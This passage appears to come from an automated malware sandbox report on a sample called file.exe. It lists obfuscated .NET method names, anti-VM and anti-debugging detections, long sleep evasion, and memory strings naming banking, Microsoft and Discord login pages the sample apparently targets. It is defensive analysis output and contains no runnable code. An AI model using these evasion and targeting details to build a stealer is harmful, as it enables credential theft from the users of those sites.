                Source: 1.2.file.exe.39b31a0.0.raw.unpack, f0aAj2bMEmUckslppK.csHigh entropy of concatenated method names: 'Dv3dDgcLOb', 'nEsd9vumrT', 'q2DdH7YTlh', 'C0od7bUjih', 'cxwdYBZZp2', 'QoXdWbeDEG', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, tACKsBfW2M3TwYiKOG.csHigh entropy of concatenated method names: 'EFPYQyVWo5', 'gQBYpM2wQy', 'me9YYYojEL', 'XPVYg0AgHc', 'sDGYEQws71', 'RH9YvnVxZn', 'Dispose', 'ioghCIL8wZ', 'E5eh4JEAMi', 'iCVhDNWMew'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, CgAGU9M9tWWICRj7qZ.csHigh entropy of concatenated method names: 'mU0J07Sp8', 'uK3VMycR7', 'sjaaAJj9R', 'TDUqtsUdM', 'pw2ckUjQR', 'OUJTneXQj', 'U5UyS2wghSeIbnFn38', 'HLJhNm7Gm2jjTxaCJ3', 'qDXhTedxq', 'rA5dMbtaM'
                Source: 1.2.file.exe.7400000.4.raw.unpack, bRKVLAxVgLuKVK4XDc.csHigh entropy of concatenated method names: 'bdo4PWNXhV', 'riW41sdZec', 'WO44uU5Qom', 'uZ04t9k3Bj', 'p8b45qchIg', 'mud4nYxOua', 'Tcs4f4RXIF', 'kcM4yebVlw', 'Pkg4LU5ncb', 'D1p4b4OqUQ'
                Source: 1.2.file.exe.7400000.4.raw.unpack, DRj7dkLtqlvEstNerM.csHigh entropy of concatenated method names: 'bahYF5yPpc', 'ISPYANGZmZ', 'glmYKZf4RE', 'BLtY3xtG6t', 'VHBYI0oogJ', 'Jb4YSx969Y', 'uT8YRSSfOA', 'CeDYB5f9I4', 'vI0YOPObxc', 'PuUYsDEjdu'
                Source: 1.2.file.exe.7400000.4.raw.unpack, NvV93N6nueQYstumkp.csHigh entropy of concatenated method names: 'wBXX7RKVLA', 'AgLXWuKVK4', 'XOLXGpPoAW', 'lQ2XejFp9D', 'VMuXQljcS1', 'niGXUPOEgd', 'w1t7Rh5vJ70RdybCPY', 'aLeGdGXD88pTcZRc3k', 'n8q0XdcS0jOpXltMtB', 'JenXXZdfZU'
                Source: 1.2.file.exe.7400000.4.raw.unpack, oxBVWtPrhilYAvO1q3.csHigh entropy of concatenated method names: 'IFrQs7RD70', 'UVsQwxOjNG', 'iA0QPJQUj7', 'ynTQ1i0kMI', 'uueQArnjCm', 'ChHQKX9hIx', 'fg5Q3pLNlj', 's4dQIvsTYr', 'sHpQS1Mjj5', 'rCXQRpgw3u'
                Source: 1.2.file.exe.7400000.4.raw.unpack, F0dYWAngXGa62bvg5S.csHigh entropy of concatenated method names: 'nvmpybQfVv', 'MFupb6yYrJ', 'LnXh2TdsBt', 'kuZhXvkVGv', 'fQep80nqtU', 'EVZpwlSGPT', 'HLDpkggNSO', 'KSNpP6UoRJ', 'q6np1WEPtP', 'wRspuMY9lM'
                Source: 1.2.file.exe.7400000.4.raw.unpack, rvds82XXmp5Lmt1XGaO.csHigh entropy of concatenated method names: 'GQedbuhZbB', 'HiOdzeE70k', 'zZZg29mEI7', 'H5ygXCkejN', 'pDNgMavkGf', 'K8Jgjf0LxP', 'uIHg6pvBEH', 'DhlgrYagg7', 'AKUgC9mNlZ', 'p1tg4RM6Xs'
                Source: 1.2.file.exe.7400000.4.raw.unpack, CtLxxLcOLpPoAWNQ2j.csHigh entropy of concatenated method names: 'gbHDV7iJ7L', 'VxYDaf0b62', 'xYoDxfp0cs', 'dPsDciIveM', 'tUMDQU7Vfl', 'g3pDUd7oY6', 'vpQDpJspEG', 'iFiDh3OM6c', 'ss9DYtpD2F', 'V4eDd1FKDI'
                Source: 1.2.file.exe.7400000.4.raw.unpack, KNWZAykLBUvM1DiVJn.csHigh entropy of concatenated method names: 'CajixT8if1', 'LJQicIeuD6', 'kbJiFRBSWZ', 'msUiAj9Wss', 'N6hi3kWGOv', 'JpaiITU0ID', 'YHOiRP5QIk', 'MXkiBMP5pi', 'lixisNX0ss', 'oDXi8O5FKU'
                Source: 1.2.file.exe.7400000.4.raw.unpack, UsXdQMRyGh14DOSdJh.csHigh entropy of concatenated method names: 'nCp7ComnB9', 'JTB7DPQsFF', 'Xuh7HNj804', 'I9IHbyuexk', 'pt3Hzq04He', 'y6j72GVVp8', 'Bdh7Xa5PVr', 'aly7M5F4fx', 'Bwy7jSuOE2', 'LWM76ifGri'
                Source: 1.2.file.exe.7400000.4.raw.unpack, hxopGhukMLFbhcLudZ.csHigh entropy of concatenated method names: 'ToString', 'XFoU86Q6ZV', 'gK9UAosgn0', 'H3YUKSQCpo', 'vc5U3mMUKf', 'P3pUIRleVh', 'DnsUSCSkaD', 'Hi8URKNQ2K', 'SOhUBrpPAQ', 'MY6UOT7kFo'
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.csHigh entropy of concatenated method names: 'OYujrykgRZ', 'NfkjCHvDou', 'QV9j4haGJv', 'WIIjDpL3kR', 'Onfj9lo7WK', 'b86jHqH9qD', 'CbQj7TRfW2', 'LTZjW2eQHm', 'egvjNqL7uX', 'tOqjGWJ54n'
                Source: 1.2.file.exe.7400000.4.raw.unpack, te1q2qAt5nMxrSFyUj.csHigh entropy of concatenated method names: 'eVcrKWT8vpqLYm6Di9g', 'OdlfgMTN6CvHi3tcoAF', 'VmX8S2TZwLRWYHbUIU2', 'gArHhOXetK', 'QpCHYivnQp', 'UQ0HdmJPLT', 'TBonwZTj10lSCRj9LQV', 'XLkG9GTbIlZY6q49vMc'
                Source: 1.2.file.exe.7400000.4.raw.unpack, iH1ojhzvhAIrnrVGKs.csHigh entropy of concatenated method names: 'g20daBF4dj', 'nIwdxe9Ivw', 'T0Cdcd28Gy', 'DfqdFrpira', 'ewLdANLXV7', 'BoHd3jUXvF', 'a3cdI7saa3', 'Wvjdv1EIKt', 'NYmdlMQHU0', 'ilhdoZ3CSn'
                Source: 1.2.file.exe.7400000.4.raw.unpack, i3U78VtUiIx3AXibNC.csHigh entropy of concatenated method names: 'qu9pG11rWQ', 'yYZpe5qnOl', 'ToString', 'tB6pC3Xo9n', 'wqKp4ROCiU', 'tdVpDJQTQM', 'oeMp99cVqJ', 'wYkpHnJxmJ', 'djip7Avf9b', 'cR0pWyRmji'
                Source: 1.2.file.exe.7400000.4.raw.unpack, xqx5ZfOUTHmOmAqYKE.csHigh entropy of concatenated method names: 'oss7lpqqtd', 'PAO7o1gRk0', 'vhT7JUeaRh', 'ddF7V9KCNg', 'ytK7Z0Ftc3', 'vH67arqA8M', 'Vah7qJbqZF', 'XuM7x7Ky5I', 'FYq7crBKNe', 'uYX7Tfu6Vw'
                Source: 1.2.file.exe.7400000.4.raw.unpack, Gp9DEHTFCEIvunMulj.csHigh entropy of concatenated method names: 'zOY9ZsiIG0', 'NcW9qoEV4s', 'pLQDK781KJ', 'YA3D3oHWxT', 'juFDIMsVqL', 'DUnDS359i7', 'rJDDRbtPQM', 'GUqDB19yT3', 'LWqDOXhiXF', 'k97DshggQJ'
                Source: 1.2.file.exe.7400000.4.raw.unpack, ES1iiGFPOEgdtc4tH1.csHigh entropy of concatenated method names: 'emnHrgOxs3', 'Is9H4j3CvT', 'zkgH9v9JoJ', 'ut6H7BORh1', 'Qp2HWW7ufX', 'ztf95YTdxx', 'qap9n8o2Dy', 'gqU9fufnDJ', 'qlT9yEfDiZ', 'yXG9LPvS2Z'
                Source: 1.2.file.exe.7400000.4.raw.unpack, AFLxX1X2yYq2USp3C44.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KODd8ra2ul', 'i0udwWbEWt', 'Tb6dkiDgVH', 'SZwdPiIW7d', 'GIgd1axmo5', 'Og1duaOyGL', 'Hn4dtntDbQ'
                Source: 1.2.file.exe.7400000.4.raw.unpack, IRLeuM44RxmjYC3sAi.csHigh entropy of concatenated method names: 'Dispose', 'c3TXLwYiKO', 'KJRMAOaQ3D', 'rcQBX4xq4T', 'mDDXbAQAxB', 'qPhXzi4uhP', 'ProcessDialogKey', 'YcxM2Rj7dk', 'TqlMXvEstN', 'mrMMMC0aAj'
                Source: 1.2.file.exe.7400000.4.raw.unpack, f0aAj2bMEmUckslppK.csHigh entropy of concatenated method names: 'Dv3dDgcLOb', 'nEsd9vumrT', 'q2DdH7YTlh', 'C0od7bUjih', 'cxwdYBZZp2', 'QoXdWbeDEG', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.file.exe.7400000.4.raw.unpack, tACKsBfW2M3TwYiKOG.csHigh entropy of concatenated method names: 'EFPYQyVWo5', 'gQBYpM2wQy', 'me9YYYojEL', 'XPVYg0AgHc', 'sDGYEQws71', 'RH9YvnVxZn', 'Dispose', 'ioghCIL8wZ', 'E5eh4JEAMi', 'iCVhDNWMew'
                Source: 1.2.file.exe.7400000.4.raw.unpack, CgAGU9M9tWWICRj7qZ.csHigh entropy of concatenated method names: 'mU0J07Sp8', 'uK3VMycR7', 'sjaaAJj9R', 'TDUqtsUdM', 'pw2ckUjQR', 'OUJTneXQj', 'U5UyS2wghSeIbnFn38', 'HLJhNm7Gm2jjTxaCJ3', 'qDXhTedxq', 'rA5dMbtaM'
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 8004, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Users\user\Desktop\file.exeMemory allocated: CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 7590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 8590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 8740000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 9740000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E096E rdtsc 4_2_017E096E
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeWindow / User API: threadDelayed 2572Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeWindow / User API: threadDelayed 7401Jump to behavior
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\regini.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\file.exe TID: 8024Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6032Thread sleep count: 2572 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6032Thread sleep time: -5144000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6032Thread sleep count: 7401 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6032Thread sleep time: -14802000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364Thread sleep time: -51000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe TID: 6364Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0241C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_0241C8D0
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 7046-nn1K.7.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: 7046-nn1K.7.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agement pageVMware20,11696501413l
                Source: 7046-nn1K.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696501413x
                Source: 7046-nn1K.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 7046-nn1K.7.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696501413x
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctiveuserers.comVMware20,11696501413}
                Source: 7046-nn1K.7.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,0
                Source: 7046-nn1K.7.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 7046-nn1K.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 7046-nn1K.7.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: QmkRHPDwxbW.exe, 00000008.00000002.3754112818.00000000013FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                Source: 7046-nn1K.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 7046-nn1K.7.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: regini.exe, 00000007.00000002.3752723389.00000000025AD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1803967425.000001DFEB8CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 7046-nn1K.7.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: 7046-nn1K.7.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: 7046-nn1K.7.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,1169650
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ropeVMware20,11696501413
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 7046-nn1K.7.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 7046-nn1K.7.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n.utiitsl.comVMware20,11696501413h
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agement pageVMware20,11696501413
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 7046-nn1K.7.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 7046-nn1K.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: entralVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 7046-nn1K.7.drBinary or memory string: global block list test formVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 7046-nn1K.7.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: regini.exe, 00000007.00000002.3759404372.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: block list test formVMware20,11696501413
                Source: 7046-nn1K.7.drBinary or memory string: discord.comVMware20,11696501413f
                Source: 7046-nn1K.7.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E096E rdtsc 4_2_017E096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00417A73 LdrLoadDll,4_2_00417A73
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01844180 mov eax, dword ptr fs:[00000030h]4_2_01844180
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01844180 mov eax, dword ptr fs:[00000030h]4_2_01844180
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185C188 mov eax, dword ptr fs:[00000030h]4_2_0185C188
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185C188 mov eax, dword ptr fs:[00000030h]4_2_0185C188
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182019F mov eax, dword ptr fs:[00000030h]4_2_0182019F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182019F mov eax, dword ptr fs:[00000030h]4_2_0182019F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182019F mov eax, dword ptr fs:[00000030h]4_2_0182019F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182019F mov eax, dword ptr fs:[00000030h]4_2_0182019F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6154 mov eax, dword ptr fs:[00000030h]4_2_017A6154
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6154 mov eax, dword ptr fs:[00000030h]4_2_017A6154
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C156 mov eax, dword ptr fs:[00000030h]4_2_0179C156
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018661C3 mov eax, dword ptr fs:[00000030h]4_2_018661C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018661C3 mov eax, dword ptr fs:[00000030h]4_2_018661C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E1D0 mov eax, dword ptr fs:[00000030h]4_2_0181E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E1D0 mov eax, dword ptr fs:[00000030h]4_2_0181E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0181E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E1D0 mov eax, dword ptr fs:[00000030h]4_2_0181E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181E1D0 mov eax, dword ptr fs:[00000030h]4_2_0181E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D0124 mov eax, dword ptr fs:[00000030h]4_2_017D0124
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018761E5 mov eax, dword ptr fs:[00000030h]4_2_018761E5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D01F8 mov eax, dword ptr fs:[00000030h]4_2_017D01F8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov eax, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov ecx, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov eax, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov eax, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov ecx, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov eax, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov eax, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov ecx, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov eax, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E10E mov ecx, dword ptr fs:[00000030h]4_2_0184E10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01860115 mov eax, dword ptr fs:[00000030h]4_2_01860115
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184A118 mov ecx, dword ptr fs:[00000030h]4_2_0184A118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184A118 mov eax, dword ptr fs:[00000030h]4_2_0184A118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184A118 mov eax, dword ptr fs:[00000030h]4_2_0184A118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184A118 mov eax, dword ptr fs:[00000030h]4_2_0184A118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01834144 mov eax, dword ptr fs:[00000030h]4_2_01834144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01834144 mov eax, dword ptr fs:[00000030h]4_2_01834144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01834144 mov ecx, dword ptr fs:[00000030h]4_2_01834144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01834144 mov eax, dword ptr fs:[00000030h]4_2_01834144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01834144 mov eax, dword ptr fs:[00000030h]4_2_01834144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01838158 mov eax, dword ptr fs:[00000030h]4_2_01838158
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179A197 mov eax, dword ptr fs:[00000030h]4_2_0179A197
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179A197 mov eax, dword ptr fs:[00000030h]4_2_0179A197
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179A197 mov eax, dword ptr fs:[00000030h]4_2_0179A197
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E0185 mov eax, dword ptr fs:[00000030h]4_2_017E0185
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CC073 mov eax, dword ptr fs:[00000030h]4_2_017CC073
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A2050 mov eax, dword ptr fs:[00000030h]4_2_017A2050
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018380A8 mov eax, dword ptr fs:[00000030h]4_2_018380A8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018660B8 mov eax, dword ptr fs:[00000030h]4_2_018660B8
